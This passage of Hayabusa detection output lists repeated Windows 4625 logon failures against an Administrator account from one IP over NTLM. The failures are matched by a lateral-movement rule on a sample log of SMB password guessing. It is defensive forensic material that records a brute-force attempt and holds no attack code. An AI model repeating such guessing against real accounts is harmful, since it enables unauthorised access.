NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQ8Zu7ByLWddD4Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: paQzUptV8scmJvsG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQLsoIX9LPvbockz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRYbdVMbUlqFK8oM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OSO730O1fxDL4DfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wmniv339HLGKB4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rO3mxvgSES0lVN34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fvK9k9tnCq5hwBqe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujFfMT6I6L8OHag9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWKY2Wh21sePUR1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6E6yf8D5cPOEwR0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpFho8k52BkBlg4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucDvfSfDYZzjNWFS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vnq3S0gEE98xfYLv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seVfaEdAS6lEXgkG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz8BQAlyYXB61tx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkHLs6yikRWVjj9F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bQUcnUBCmE81G6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BceDCcXoHJQv9pDi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCCLt49g8wmAMEyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pM6C8KRcxVIUsZrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fw5DU6l3QRVl9cWY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37UthbuO3m4Lr7dU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: URB7Ji5pQleLtvy4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: orP9OgiBrYIKZPXE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZwvdnlIWhqoDg8On : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v6dXVbmLBpXc39ah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Mu7amiHAg0l7bza : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JdG6F697kAXFDx9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jY5AAnfQMH3VZQUa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVep4j7jZZAOAQAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KWWtGIQx8jBgAeoH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zn8X8gen8gX9i3QK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9OdUM99RBHzwgVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJbBVm6wDrqyQmpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAVRBfMxIyrfsEtR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wuCIClZihRxRyjGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxhpEP6nnmihvkHB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1HYmJDrWmKjj8DF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V81dIfR2SRNDk3a2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vaZpLaxB1kcCXqHP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRhs8IoV6R6vyCdL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wUYds3Ym3G2abrV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmBfxm6pPLlSEsUI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VbAuqFggx0zz5iEn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cytpVOjb4KrNaGg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BFFFt7eFzmlzbHhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJQBZZiNKVGXzx4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gyu6EyrtbyowTfC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aASpkRuPfE8Nl64n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MSI2b7LpZpWO3xJW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avNkOq3fsGN3yYJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wnlgy6dW33tRk6UX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: msJ8QrqMluTeUlM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H33NuKduMuskxL0D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BHjp69CD1ttbaK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uxByLPApvfeIhU2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6g0WOAnoGpKyEyzW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P8MTs4Nkbm3ryqcp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Nyd7tr3y0BHmPLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J5KiDQOEnDf6xEPN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3MBP1buuRcBRiQTG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXdcg3MSqnGSvax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kej7zgIDCNR5tnnp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM8SOeQXwytB6iw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XPNATM0IL05vtbZ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H56ci5gbBVzebS2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rRofLg1uxrojU7n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MAhtwTU8OttAhcxf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CwKgAR6OWbkFlxUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lNZR4G0DVsXVg4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZG99tl0RRN3cQoK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nwRzAutxa07Y1xE4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OwhvrVBSRa8RcCKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bLBwBys2favoK7BQ : IP Address: 192.168.198.149 : AuthPackage: 